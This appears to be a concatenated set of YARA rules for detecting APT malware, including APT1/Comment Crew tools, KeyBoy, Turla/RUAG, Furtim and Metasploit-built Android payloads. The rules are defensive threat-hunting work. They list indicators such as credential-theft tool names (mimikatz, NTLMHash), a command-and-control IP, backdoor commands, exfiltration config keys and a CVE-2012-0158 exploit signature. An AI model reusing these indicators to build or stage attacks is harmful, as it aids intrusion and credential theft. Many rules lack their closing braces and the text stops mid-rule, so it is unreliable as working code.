           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = "Eclipse_A" wide ascii   
           $b = "\\PJTS\\" wide ascii   
           $c = "Eclipse_Client_B.pdb" wide ascii   
           $d = "XiaoME" wide ascii   
           $e = "SunCloud-Code" wide ascii   
           $f = "/uc_server/data/forum.asp" wide ascii   
      
       condition:   
           any of them   
rule APT1_MAPIGET   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "%s\\Attachment.dat" wide ascii   
           $s2 = "MyOutlook" wide ascii   
           $s3 = "mail.txt" wide ascii   
           $s4 = "Recv Time:" wide ascii   
           $s5 = "Subject:" wide ascii   
      
       condition:   
          all of them   
rule ccrewSSLBack3   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = "SLYHKAAY" wide ascii   
      
     condition:   
           any of them   
rule APT1_dbg_mess   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $dbg1 = "Down file ok!" wide ascii   
           $dbg2 = "Send file ok!" wide ascii   
           $dbg3 = "Command Error!" wide ascii   
           $dbg4 = "Pls choose target first!" wide ascii   
           $dbg5 = "Alert!" wide ascii   
           $dbg6 = "Pls press enter to make sure!" wide ascii   
           $dbg7 = "Are you sure to " wide ascii   
           $pay1 = "rusinfo.exe" wide ascii   
           $pay2 = "cmd.exe" wide ascii   
           $pay3 = "AdobeUpdater.exe" wide ascii   
           $pay4 = "buildout.exe" wide ascii   
           $pay5 = "DefWatch.exe" wide ascii   
           $pay6 = "d.exe" wide ascii   
           $pay7 = "em.exe" wide ascii   
           $pay8 = "IMSCMig.exe" wide ascii   
           $pay9 = "localfile.exe" wide ascii   
           $pay10 = "md.exe" wide ascii   
           $pay11 = "mdm.exe" wide ascii   
           $pay12 = "mimikatz.exe" wide ascii   
           $pay13 = "msdev.exe" wide ascii   
           $pay14 = "ntoskrnl.exe" wide ascii   
           $pay15 = "p.exe" wide ascii   
           $pay16 = "otepad.exe" wide ascii   
           $pay17 = "reg.exe" wide ascii   
           $pay18 = "regsvr.exe" wide ascii   
           $pay19 = "runinfo.exe" wide ascii   
           $pay20 = "AdobeUpdate.exe" wide ascii   
           $pay21 = "inetinfo.exe" wide ascii   
           $pay22 = "svehost.exe" wide ascii   
           $pay23 = "update.exe" wide ascii   
           $pay24 = "NTLMHash.exe" wide ascii   
           $pay25 = "wpnpinst.exe" wide ascii   
           $pay26 = "WSDbg.exe" wide ascii   
           $pay27 = "xcmd.exe" wide ascii   
           $pay28 = "adobeup.exe" wide ascii   
           $pay29 = "0830.bin" wide ascii   
           $pay30 = "1001.bin" wide ascii   
           $pay31 = "a.bin" wide ascii   
           $pay32 = "ISUN32.EXE" wide ascii   
           $pay33 = "AcroRD32.EXE" wide ascii   
           $pay34 = "INETINFO.EXE" wide ascii   
      
       condition:   
           4 of ($dbg*) and 1 of ($pay*)   
rule NEWSREELS_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)" wide ascii   
           $s2 = "name=%s&userid=%04d&other=%c%s" wide ascii   
           $s3 = "download ok!" wide ascii   
           $s4 = "command is null!" wide ascii   
           $s5 = "noclient" wide ascii   
           $s6 = "wait" wide ascii   
           $s7 = "active" wide ascii   
           $s8 = "hello" wide ascii   
      
       condition:   
           all of them   
rule ccrewDownloader1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = {DD B5 61 F0 20 47 20 57 D6 65 9C CB 31 1B 65 42}   
      
       condition:   
           any of them   
rule APT1_WEBC2_ADSPACE   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $1 = "<!---HEADER ADSPACE style=" wide ascii   
           $2 = "ERSVC.DLL" wide ascii   
      
       condition:   
           all of them   
rule APT1_GDOCUPLOAD   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $str1 = "name=\"GALX\"" wide ascii   
           $str2 = "User-Agent: Shockwave Flash" wide ascii   
           $str3 = "add cookie failed..." wide ascii   
           $str4 = ",speed=%f" wide ascii   
      
       condition:   
           3 of them   
rule APT1_WEBC2_BOLID   
   {   
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
            
       strings:   
           $vm = "VMProtect" wide ascii   
           $http = "http://[c2_location]/[page].html" wide ascii   
      
       condition:   
           all of them   
rule STARSYPOUND_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "*(SY)# cmd" wide ascii   
           $s2 = "send = %d" wide ascii   
           $s3 = "cmd.exe" wide ascii   
           $s4 = "*(SY)#" wide ascii   
      
       condition:   
           all of them   
rule DownloaderPossibleCCrew   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = "%s?%.6u" wide ascii   
           $b = "szFileUrl=%s" wide ascii   
           $c = "status=%u" wide ascii   
           $d = "down file success" wide ascii   
           $e = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" wide ascii   
      
     condition:   
           all of them   
rule APT1_WEBC2_CLOVER   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $msg1 = "BUILD ERROR!" wide ascii   
           $msg2 = "SUCCESS!" wide ascii   
           $msg3 = "wild scan" wide ascii   
           $msg4 = "Code too clever" wide ascii   
           $msg5 = "insufficient lookahead" wide ascii   
           $ua1 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)" wide ascii   
           $ua2 = "Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12" wide ascii   
      
       condition:   
           2 of ($msg*) and 1 of ($ua*)   
rule ccrewSSLBack1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $a = "!@#%$^#@!" wide ascii   
           $b = "64.91.80.6" wide ascii   
      
     condition:   
           any of them   
rule GOGGLES_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $s1 = "Kill process success!" wide ascii   
           $s2 = "Kill process failed!" wide ascii   
           $s3 = "Sleep success!" wide ascii   
           $s4 = "based on gloox" wide ascii   
           $pdb = "glooxtest.pdb" wide ascii   
      
       condition:   
           all of ($s*) or $pdb   
rule Elise   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
             
       strings:   
           $a = "SetElise.pdb" wide ascii   
      
       condition:   
           $a   
rule SEASALT_APT1   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
            
       strings:   
           $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM" wide ascii   
           $s2 = "upfileok" wide ascii   
           $s3 = "download ok!" wide ascii   
           $s4 = "upfileer" wide ascii   
           $s5 = "fxftest" wide ascii   
      
       condition:   
           all of them   
rule APT1_LIGHTBOLT   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $str1 = "bits.exe" wide ascii   
           $str2 = "PDFBROW" wide ascii   
           $str3 = "Browser.exe" wide ascii   
           $str4 = "Protect!" wide ascii   
      
       condition:   
           2 of them   
rule APT1_GETMAIL   
   {   
      
       meta:   
           author = "AlienVault Labs"   
           info = "CommentCrew-threat-apt1"   
              
       strings:   
           $stra1 = "pls give the FULL path" wide ascii   
           $stra2 = "mapi32.dll" wide ascii   
           $stra3 = "doCompress" wide ascii   
           $strb1 = "getmail.dll" wide ascii   
           $strb2 = "doCompress" wide ascii   
           $strb3 = "love" wide ascii   
      
       condition:   
           all of ($stra*) or all of ($strb*)   
rule BangatStrings   
   {   
          
       meta:   
           description = "Bangat Identifying Strings"   
           author = "Seth Hardy"   
           last_modified = "2014-07-10"   
              
       strings:   
           $lib1 = "DreatePipe"   
           $lib2 = "HetSystemDirectoryA"   
           $lib3 = "SeleaseMutex"   
           $lib4 = "DloseWindowStation"   
           $lib5 = "DontrolService"   
           $file = "~hhC2F~.tmp"   
           $mc = "~_MC_3~"   
      
       condition:   
          all of ($lib*) or $file or $mc   
rule BangatCode   
   {   
          
       meta:   
           description = "Bangat code features"   
           author = "Seth Hardy"   
           last_modified = "2014-07-10"   
          
       strings:   
           // dec [ebp + procname], push eax, push edx, call get procaddress   
           $ = { FE 4D ?? 8D 4? ?? 50 5? FF }   
          
       condition:   
           any of them   
rule CookiesStrings   
   {   
       meta:   
           description = "Cookies Identifying Strings"   
           author = "Seth Hardy"   
           last_modified = "2014-06-20"   
              
       strings:   
           $zip1 = "ntdll.exePK"   
           $zip2 = "AcroRd32.exePK"   
           $zip3 = "Setup=ntdll.exe\x0d\x0aSilent=1\x0d\x0a"   
           $zip4 = "Setup=%temp%\\AcroRd32.exe\x0d\x0a"   
           $exe1 = "Leave GetCommand!"   
           $exe2 = "perform exe success!"   
           $exe3 = "perform exe failure!"   
           $exe4 = "Entry SendCommandReq!"   
           $exe5 = "Reqfile not exist!"   
           $exe6 = "LeaveDealUpfile!"   
           $exe7 = "Entry PostData!"   
           $exe8 = "Leave PostFile!"   
           $exe9 = "Entry PostFile!"   
           $exe10 = "\\unknow.zip" wide ascii   
           $exe11 = "the url no respon!"   
              
       condition:   
         (2 of ($zip*)) or (2 of ($exe*))   
rule GlassesStrings : Glasses Family   
   {   
       meta:   
           description = "Strings used by Glasses"   
           author = "Seth Hardy"   
           last_modified = "2014-07-22"   
              
       strings:   
           $ = "thequickbrownfxjmpsvalzydg"   
           $ = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)"   
           $ = "\" target=\"NewRef\"></a>"   
       
       condition:   
           all of them   
      
rule MiniAsp3_mem : memory {    
     meta: author = "chort (@chort0)"   
     description = "Detect MiniASP3 in memory"   
     strings:    
       $pdb = "MiniAsp3\\Release\\MiniAsp.pdb" fullword    
       $httpAbout = "http://%s/about.htm" fullword    
       $httpResult = "http://%s/result_%s.htm" fullword    
       $msgInetFail = "open internet failed" fullword    
       $msgRunErr = "run error!" fullword    
       $msgRunOk = "run ok!" fullword   
       $msgTimeOutM0 = "time out,change to mode 0" fullword    
       $msgCmdNull = "command is null!" fullword    
   condition:   
     ($pdb and (all of ($http*)) and any of ($msg*))   
     }
rule WarpCode : Warp Family    
   {   
       meta:   
           description = "Warp code features"   
           author = "Seth Hardy"   
           last_modified = "2014-07-10"   
          
       strings:   
           // character replacement   
           $ = { 80 38 2B 75 03 C6 00 2D 80 38 2F 75 03 C6 00 5F }   
          
       condition:   
           any of them   
rule WarpStrings : Warp Family   
   {   
       meta:   
           description = "Warp Identifying Strings"   
           author = "Seth Hardy"   
           last_modified = "2014-07-10"   
              
       strings:   
           $ = "/2011/n325423.shtml?"   
           $ = "wyle"   
           $ = "\\~ISUN32.EXE"   
      
       condition:   
          any of them   
// https://otx.alienvault.com/pulse/58c49c14a4d4fe2b56f7222e
// https://otx.alienvault.com/pulse/5977d8e5f7cda5036057bdb9
rule android_metasploit : android   
   {   
   	meta:   
   		author = "https://twitter.com/plutec_net"   
   		description = "This rule detects apps made with metasploit framework"   
   		sample = "cb9a217032620c63b85a58dde0f9493f69e4bda1e12b180047407c15ee491b41"   
      
   	strings:   
   		$a = "*Lcom/metasploit/stage/PayloadTrustManager;"   
   		$b = "(com.metasploit.stage.PayloadTrustManager"   
   		$c = "Lcom/metasploit/stage/Payload$1;"   
   		$d = "Lcom/metasploit/stage/Payload;"   
      
   	condition:   
   		all of them   
   		   
// https://otx.alienvault.com/pulse/582a7cbbc9eef92d31ad7c90
// https://otx.alienvault.com/pulse/5979fb8ff7cda54d2f57bdb7
// https://otx.alienvault.com/pulse/584005cc54c08e6719172eb7
// https://otx.alienvault.com/pulse/54f51dd813432a7ab0187afa
// https://otx.alienvault.com/pulse/57ba544df33d540135015351
// https://otx.alienvault.com/pulse/582e056ee26e8e7419ad5a4b
rule keyboy_systeminfo      
      {      
          meta:      
              author = "Matt Brooks, @cmatthewbrooks"      
              desc = "Matches the system information format before sending to C2"      
              date = "2016-08-28"      
              md5 = "495adb1b9777002ecfe22aaf52fcee93"      
                
          strings:      
              //These strings are ASCII pre-2015 and UNICODE in 2016      
              $s1 = "SystemVersion:    %s" ascii wide      
              $s2 = "Product  ID:      %s" ascii wide      
              $s3 = "InstallPath:      %s" ascii wide      
              $s4 = "InstallTime:      %d-%d-%d, %02d:%02d:%02d" ascii wide      
              $s5 = "ResgisterGroup:   %s" ascii wide      
              $s6 = "RegisterUser:     %s" ascii wide      
              $s7 = "ComputerName:     %s" ascii wide      
              $s8 = "WindowsDirectory: %s" ascii wide      
              $s9 = "System Directory: %s" ascii wide      
              $s10 = "Number of Processors:       %d" ascii wide      
              $s11 = "CPU[%d]:  %s: %sMHz" ascii wide      
              $s12 = "RAM:         %dMB Total, %dMB Free." ascii wide      
              $s13 = "DisplayMode: %d x %d, %dHz, %dbit" ascii wide      
              $s14 = "Uptime:      %d Days %02u:%02u:%02u" ascii wide      
                    
          condition:      
              //MZ header      
              uint16(0) == 0x5A4D and      
                    
              //PE signature      
              uint32(uint32(0x3C)) == 0x00004550 and      
              filesize < 200KB and      
              7 of them      
      }
rule CVE_2012_0158_KeyBoy {      
        meta:      
            author = "Etienne Maynier <etienne@citizenlab.ca>"      
            description = "CVE-2012-0158 variant"      
            file = "8307e444cad98b1b59568ad2eba5f201"      
            
        strings:      
            $a = "d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff09000600000000000000000000000100000001" nocase // OLE header      
            $b = "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff" nocase // junk data      
            $c = /5(\{\\b0\}|)[ ]*2006F00(\{\\b0\}|)[ ]*6F007(\{\\b0\}|)[ ]*400200045(\{\\b0\}|)[ ]*006(\{\\b0\}|)[ ]*E007(\{\\b0\}|)[ ]*400720079/ nocase      
            $d = "MSComctlLib.ListViewCtrl.2"      
            $e = "ac38c874503c307405347aaaebf2ac2c31ebf6e8e3" nocase //decoding shellcode      
            
        condition:      
            all of them      
      }
rule keyboy_errors      
      {      
          meta:      
              author = "Matt Brooks, @cmatthewbrooks"      
              desc = "Matches the sample's shell error2 log statements"      
              date = "2016-08-28"      
              md5 = "495adb1b9777002ecfe22aaf52fcee93"      
                
          strings:      
              //These strings are in ASCII pre-2015 and UNICODE in 2016      
              $error = "Error2" ascii wide      
              //2016 specific:      
              $s1 = "Can't find [%s]!Check the file name and try again!" ascii wide      
              $s2 = "Open [%s] error! %d" ascii wide      
              $s3 = "The Size of [%s] is zero!" ascii wide      
              $s4 = "CreateThread DownloadFile[%s] Error!" ascii wide      
              $s5 = "UploadFile [%s] Error:Connect Server Failed!" ascii wide      
              $s6 = "Receive [%s] Error(Recved[%d] != Send[%d])!" ascii wide      
              $s7 = "Receive [%s] ok! Use %2.2f seconds, Average speed %2.2f k/s" ascii wide      
              $s8 = "CreateThread UploadFile[%s] Error!" ascii wide      
              //Pre-2016:      
              $s9 = "Ready Download [%s] ok!" ascii wide      
              $s10 = "Get ControlInfo from FileClient error!" ascii wide      
              $s11 = "FileClient has a error!" ascii wide      
              $s12 = "VirtualAlloc SendBuff Error(%d)" ascii wide      
              $s13 = "ReadFile [%s] Error(%d)..." ascii wide      
              $s14 = "ReadFile [%s] Data[Readed(%d) != FileSize(%d)] Error..." ascii wide      
              $s15 = "CreateThread DownloadFile[%s] Error!" ascii wide      
              $s16 = "RecvData MyRecv_Info Size Error!" ascii wide      
              $s17 = "RecvData MyRecv_Info Tag Error!" ascii wide      
              $s18 = "SendData szControlInfo_1 Error!" ascii wide      
              $s19 = "SendData szControlInfo_3 Error!" ascii wide      
              $s20 = "VirtualAlloc RecvBuff Error(%d)" ascii wide      
              $s21 = "RecvData Error!" ascii wide      
              $s22 = "WriteFile [%s} Error(%d)..." ascii wide      
                    
          condition:      
              //MZ header      
              uint16(0) == 0x5A4D and      
                    
              //PE signature      
              uint32(uint32(0x3C)) == 0x00004550 and      
              filesize < 200KB and      
              $error and 3 of ($s*)      
      }
rule keyboy_commands      
      {      
          meta:      
              author = "Matt Brooks, @cmatthewbrooks"      
              desc = "Matches the 2016 sample's sent and received commands"      
              date = "2016-08-28"      
              md5 = "495adb1b9777002ecfe22aaf52fcee93"      
                
          strings:      
              $s1 = "Update" wide fullword      
              $s2 = "UpdateAndRun" wide fullword      
              $s3 = "Refresh" wide fullword      
              $s4 = "OnLine" wide fullword      
              $s5 = "Disconnect" wide fullword      
              $s6 = "Pw_Error" wide fullword      
              $s7 = "Pw_OK" wide fullword      
              $s8 = "Sysinfo" wide fullword      
              $s9 = "Download" wide fullword      
              $s10 = "UploadFileOk" wide fullword      
              $s11 = "RemoteRun" wide fullword      
              $s12 = "FileManager" wide fullword      
                    
          condition:      
              //MZ header      
              uint16(0) == 0x5A4D and      
                    
              //PE signature      
              uint32(uint32(0x3C)) == 0x00004550 and      
              filesize < 200KB and      
              6 of them      
      }
rule new_keyboy_header_codes   
   {   
      
       meta:   
           author = "Matt Brooks, @cmatthewbrooks"   
           desc = "Matches the 2016 sample's header codes"   
           date = "2016-08-28"   
           md5 = "495adb1b9777002ecfe22aaf52fcee93"   
      
       strings:   
           $s1 = "*l*" wide fullword   
           $s2 = "*a*" wide fullword   
           $s3 = "*s*" wide fullword   
           $s4 = "*d*" wide fullword   
           $s5 = "*f*" wide fullword   
           $s6 = "*g*" wide fullword   
           $s7 = "*h*" wide fullword   
      
       condition:   
           //MZ header //PE signature   
           uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB and all of them   
// https://otx.alienvault.com/pulse/5936f79bc8787f6cbabf34cd
rule RUAG_Cobra_Malware    
   {   
      
     meta:   
       description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"   
       author = "Florian Roth"   
       reference = "https://goo.gl/N5MEj0"   
       score = 60   
       
     strings:   
       $s1 = "\\Cobra\\Release\\Cobra.pdb" ascii   
        
     condition:   
       uint16(0) == 0x5a4d and $s1   
rule RUAG_Bot_Config_File    
   {   
      
     meta:   
       description = "Detects a specific config file used by malware in RUAG APT case"   
       author = "Florian Roth"   
       reference = "https://goo.gl/N5MEj0"   
       score = 60   
        
     strings:   
       $s1 = "[CONFIG]" ascii   
       $s2 = "name = " ascii   
       $s3 = "exe = cmd.exe" ascii   
        
     condition:   
       $s1 at 0 and $s2 and $s3 and filesize < 160    
rule RUAG_Cobra_Config_File    
   {   
      
     meta:   
       description = "Detects a config text file used by malware Cobra in RUAG case"   
       author = "Florian Roth"   
       reference = "https://goo.gl/N5MEj0"   
       score = 60   
      
     strings:   
       $h1 = "[NAME]" ascii   
       $s1 = "object_id=" ascii   
       $s2 = "[TIME]" ascii fullword   
       $s3 = "lastconnect" ascii    
       $s4 = "[CW_LOCAL]" ascii fullword   
       $s5 = "system_pipe" ascii   
       $s6 = "user_pipe" ascii   
       $s7 = "[TRANSPORT]" ascii   
       $s8 = "run_task_system" ascii   
       $s9 = "[WORKDATA]" ascii    
       $s10 = "address1" ascii   
        
     condition:   
       $h1 at 0 and 8 of ($s*) and filesize < 5KB   
rule Turla_APT_Malware_Gen3    
   {   
      
       meta:   
           description = "Detects Turla malware (based on sample used in the RUAG APT case)"   
           author = "Florian Roth"   
           family = "Turla"   
           reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"   
           date = "2016-06-09"   
           hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"   
           hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"   
           hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"   
           hash4 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"   
           hash5 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"   
           hash6 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"   
           hash7 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"   
           hash8 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"   
           hash9 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"   
        
       strings:   
           $x1 = "\\\\.\\pipe\\sdlrpc" fullword ascii   
           $x2 = "WaitMutex Abandoned %p" fullword ascii   
           $x3 = "OPER|Wrong config: no port|" fullword ascii   
           $x4 = "OPER|Wrong config: no lastconnect|" fullword ascii   
           $x5 = "OPER|Wrong config: empty address|" fullword ascii   
           $x6 = "Trans task %d obj %s ACTIVE fail robj %s" fullword ascii   
           $x7 = "OPER|Wrong config: no auth|" fullword ascii   
           $x8 = "OPER|Sniffer '%s' running... ooopppsss...|" fullword ascii   
           $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" fullword ascii   
           $s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" fullword ascii   
           $s3 = "www.yahoo.com" fullword ascii   
           $s4 = "MSXIML.DLL" fullword wide   
           $s5 = "www.bing.com" fullword ascii   
           $s6 = "%s: http://%s%s" fullword ascii   
           $s7 = "/javascript/view.php" fullword ascii   
           $s8 = "Task %d failed %s,%d" fullword ascii   
           $s9 = "Mozilla/4.0 (compatible; MSIE %d.0; " fullword ascii   
         
       condition:   
           ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 6 of ($s*) ) ) or ( 10 of them )   
rule Turla_APT_Malware_Gen1    
   {   
      
       meta:   
           description = "Detects Turla malware (based on sample used in the RUAG APT case)"   
           author = "Florian Roth"   
           family = "Turla"   
           reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"   
           date = "2016-06-09"   
           hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"   
           hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"   
           hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"   
           hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"   
           hash5 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"   
           hash6 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"   
           hash7 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"   
           hash8 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"   
           hash9 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"   
           hash10 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"   
          
       strings:   
           $x1 = "too long data for this type of transport" fullword ascii   
           $x2 = "not enough server resources to complete operation" fullword ascii   
           $x3 = "Task not execute. Arg file failed." fullword ascii   
           $x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" fullword ascii   
           $s1 = "peer has closed the connection" fullword ascii   
           $s2 = "tcpdump.exe" fullword ascii   
           $s3 = "windump.exe" fullword ascii   
           $s4 = "dsniff.exe" fullword ascii   
           $s5 = "wireshark.exe" fullword ascii   
           $s6 = "ethereal.exe" fullword ascii   
           $s7 = "snoop.exe" fullword ascii   
           $s8 = "ettercap.exe" fullword ascii   
           $s9 = "miniport.dat" fullword ascii   
           $s10 = "net_password=%s" fullword ascii   
          
       condition:   
           ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 2 of ($x*) or 8 of ($s*) ) ) or ( 12 of them )   
rule Turla_APT_srsvc    
   {   
      
       meta:   
           description = "Detects Turla malware (based on sample used in the RUAG APT case)"   
           author = "Florian Roth"   
           family = "Turla"   
           reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"   
           date = "2016-06-09"   
           hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7"   
           hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac"   
        
       strings:   
           $x1 = "SVCHostServiceDll.dll" fullword ascii   
           $s2 = "msimghlp.dll" fullword wide   
           $s3 = "srservice" fullword wide   
           $s4 = "ModStart" fullword ascii   
           $s5 = "ModStop" fullword ascii   
          
       condition:   
           ( uint16(0) == 0x5a4d and filesize < 20KB and ( 1 of ($x*) or all of ($s*) ) ) or ( all of them )   
rule Turla_APT_Malware_Gen2    
   {   
      
       meta:   
           description = "Detects Turla malware (based on sample used in the RUAG APT case)"   
           author = "Florian Roth"   
           family = "Turla"   
           reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"   
           date = "2016-06-09"   
           hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"   
           hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"   
           hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"   
           hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"   
        
       strings:   
           $x1 = "Internal command not support =((" fullword ascii   
           $x2 = "L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|" fullword ascii   
           $x3 = "L|-1|CreateProcessAsUser():%d, %s|" fullword ascii   
           $x4 = "AS_CUR_USER:OpenProcessToken():%d" fullword ascii   
           $x5 = "L|-1|AS_CUR_USER:LogonUser():%d, %s|" fullword ascii   
           $x6 = "L|-1|try to run dll %s with user priv|" fullword ascii   
           $x7 = "\\\\.\\Global\\PIPE\\sdlrpc" fullword ascii   
           $x8 = "\\\\%s\\pipe\\comnode" fullword ascii   
           $x9 = "Plugin dll stop failed." fullword ascii   
           $x10 = "AS_USER:LogonUser():%d" fullword ascii   
           $s1 = "MSIMGHLP.DLL" fullword wide   
           $s2 = "msimghlp.dll" fullword ascii   
           $s3 = "ximarsh.dll" fullword ascii   
           $s4 = "msximl.dll" fullword ascii   
           $s5 = "INTERNAL.dll" fullword ascii   
           $s6 = "\\\\.\\Global\\PIPE\\" fullword ascii   
           $s7 = "ieuser.exe" fullword ascii   
          
       condition:   
           ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 5 of ($s*) ) ) or ( 10 of them )   
rule RUAG_Exfil_Config_File    
   {   
      
     meta:   
       description = "Detects a config text file used in data exfiltration in RUAG case"   
       author = "Florian Roth"   
       reference = "https://goo.gl/N5MEj0"   
       score = 60   
      
     strings:   
       $h1 = "[TRANSPORT]" ascii   
       $s1 = "system_pipe" ascii   
       $s2 = "spstatus" ascii   
       $s3 = "adaptable" ascii    
       $s4 = "post_frag" ascii   
       $s5 = "pfsgrowperiod" ascii   
        
     condition:   
       $h1 at 0 and all of ($s*) and filesize < 1KB   
rule RUAG_Tavdig_Malformed_Executable    
   {   
      
     meta:   
       description = "Detects an embedded executable with a malformed header - known from Tavdig malware"   
       author = "Florian Roth"   
       reference = "https://goo.gl/N5MEj0"   
       score = 60   
        
     condition:   
     /* MZ Header and malformed PE header > 0x0bad */   
       uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x0000AD0B    
// https://otx.alienvault.com/pulse/588f30792f464907f45629f8
// https://otx.alienvault.com/pulse/5975e808097211677f362a3c
rule Furtim_nativeDLL    
   {   
      
       meta:   
           description = "Detects Furtim malware - file native.dll"   
           author = "Florian Roth"   
           reference = "MISP 3971"   
           date = "2016-06-13"   
           hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"   
      
       strings:   
           $s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" fullword ascii   
           $op0 = { e0 b3 42 00 c7 84 24 ac } /* Opcode */   
           $op1 = { a1 e0 79 44 00 56 ff 90 10 01 00 00 a1 e0 79 44 } /* Opcode */   
           $op2 = { bf d0 25 44 00 57 89 4d f0 ff 90 d4 02 00 00 59 } /* Opcode */   
       condition:   
           uint16(0) == 0x5a4d and filesize < 900KB and $s1 or all of ($op*)   
rule Furtim_Parent_1    
   {   
      
       meta:   
           description = "Detects Furtim Parent Malware"   
           author = "Florian Roth"   
           reference = "https://sentinelone.com/blogs/sfg-furtims-parent/"   
           date = "2016-07-16"   
           hash1 = "766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963"   
      
       strings:   
           /* RC4 encryption password */   
           $x1 = "dqrChZonUF" fullword ascii   
           /* Other strings */   
           $s1 = "Egistec" fullword wide   
           $s2 = "Copyright (C) 2016" fullword wide   
           /* Op Code */   
           $op1 = { c0 ea 02 88 55 f8 8a d1 80 e2 03 }   
           $op2 = { 5d fe 88 55 f9 8a d0 80 e2 0f c0 }   
